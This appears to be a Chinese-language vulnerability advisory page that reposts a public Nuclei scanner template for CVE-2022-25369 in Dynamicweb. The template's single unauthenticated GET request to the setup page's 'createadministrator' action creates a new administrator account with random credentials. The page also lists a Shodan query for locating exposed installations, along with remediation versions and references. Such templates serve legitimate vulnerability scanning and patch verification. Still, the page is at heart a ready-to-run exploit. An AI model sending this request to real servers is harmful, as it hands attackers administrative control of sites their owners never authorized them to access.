CVE-2022-25369: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation

日期: 2025-08-01 | 影响软件: Dynamicweb | POC: 已公开

漏洞描述

Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.

PoC代码[已公开]

id: CVE-2022-25369

info:
  name: Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation
  author: pdteam
  severity: critical
  description: Dynamicweb contains a vulnerability which allows an unauthenticated attacker to create a new administrative user.
  remediation: 'Upgrade to one of the fixed versions or higher: Dynamicweb 9.5.9, 9.6.16, 9.7.8, 9.8.11, 9.9, 9.10.18, 9.12.8, or 9.13.0.'
  reference:
    - https://blog.assetnote.io/2022/02/20/logicflaw-dynamicweb-rce/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25369
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-25369
    cwe-id: CWE-425
  metadata:
    max-request: 1
    shodan-query: http.component:"Dynamicweb"
  tags: cve2022,cve,dynamicweb,rce,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"Success": true'
          - '"Success":true'
        condition: or

      - type: word
        part: header
        words:
          - 'application/json'
          - 'ASP.NET_SessionId'
        condition: and
        case-insensitive: true

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203053b2d84fdf8b3effb39ab83f95b5f34995f2560e010681cf2cc289f3cb6c93022100d06e03f477b17b87fc45553b75edfb57d433c28e184eb52fe1e0515d7600ef9e:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-25369.yaml

相关漏洞推荐